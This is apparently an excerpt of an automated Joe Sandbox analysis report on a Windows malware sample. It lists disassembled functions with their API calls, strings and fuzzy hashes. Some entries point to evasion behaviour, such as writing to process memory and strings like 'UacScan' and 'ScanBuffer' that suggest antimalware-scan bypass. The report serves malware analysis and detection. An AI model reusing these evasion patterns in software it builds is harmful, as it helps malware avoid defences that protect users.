Function 02B1E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781

Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
Instruction ID: 31705c05396b3093132a35808ecb0407729877560101d150f040d0c1827d8464
Opcode Fuzzy Hash: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
Instruction Fuzzy Hash: C111C8307102108BE735AF29C8C8A6677DBEF8575079084E6ED4B8F215DB30EC41DB62

Function 02B1E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02B1E43C

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
Instruction ID: aac2e1a7479b28b3d4be163968fb7e115db2a87ac9fdc6a70b521e5dc32b1f5b
Opcode Fuzzy Hash: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
Instruction Fuzzy Hash: 38317171A00209AFDB14DFA8D886AAE77F8EB0C304F8844E5FD09D7250D734EA50CBA5

Function 02B289D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC

Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4

FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
Instruction ID: 401c5546b03e7ac287ec388b66642f19348bdca534cc7cf9fffcb5614c4529ea
Opcode Fuzzy Hash: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
Instruction Fuzzy Hash: C02157F0694310AFEB00F7B4DD02B9DB7EADB05740F9044E0F608E7190DE749905AA1D

Function 02B26D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99

Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
Instruction ID: 4a4b92f9f1f1dedc7eb8ea25957ab6f61ee95683d80a25ff4dff7ca629b22b25
Opcode Fuzzy Hash: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
Instruction Fuzzy Hash: 4CE0ED7520031CBBE711EB62DC42D8E7BBDDB8A750B9104F1F804A3610EA31AE048860

Function 02B15868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886

Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: 7c9d9dffa2493a11e4723fb4feeb4da078b4d5d2d69a9d08b4af680170e4844a
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: EBE09271A003148FCB20DE9CC8C0B4633D8AF48750F840AA1ED68CF346D7B0D9608BD0

Function 02B17DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: d311b245ac91300b6e3f49358a685782d7e933ed16b4da00ed8024326a8731f9
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: 16D05BB63091507AE224965A5D44EA75BDCCFC6770F50067DF558C7180D7208C01C671

Function 02B17E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 632a84800eedb7547e335e22df8e8bc69168021fc75e2a83c2b73d2cf3e45fdf
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: 2DC08CF32112010E1E60A9BC1CC425963CD8B842347E01EE1E438CB2C9DB1698663820

Function 02B17E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850

Function 02B14C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02B14C8B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0

Function 02B3C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68

Function 02B14C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835

Function 02B14C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02B14C57

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0

Function 02B115CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00

Function 02B11682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4

Function 02B116E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64

Non-executed Functions

Function 02B2AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56

Strings

Heap32ListFirst, xrefs: 02B2AB52
Heap32First, xrefs: 02B2AB76
Heap32ListNext, xrefs: 02B2AB64
kernel32.dll, xrefs: 02B2AB2B
Heap32Next, xrefs: 02B2AB88
Process32FirstW, xrefs: 02B2ABD0
Toolhelp32ReadProcessMemory, xrefs: 02B2AB9A
Module32FirstW, xrefs: 02B2AC3C
Module32NextW, xrefs: 02B2AC4E
Thread32First, xrefs: 02B2ABF4
Process32NextW, xrefs: 02B2ABE2
Process32First, xrefs: 02B2ABAC
Module32First, xrefs: 02B2AC18
Thread32Next, xrefs: 02B2AC06
CreateToolhelp32Snapshot, xrefs: 02B2AB40
Process32Next, xrefs: 02B2ABBE
Module32Next, xrefs: 02B2AC2A

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11

Function 02B15908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99

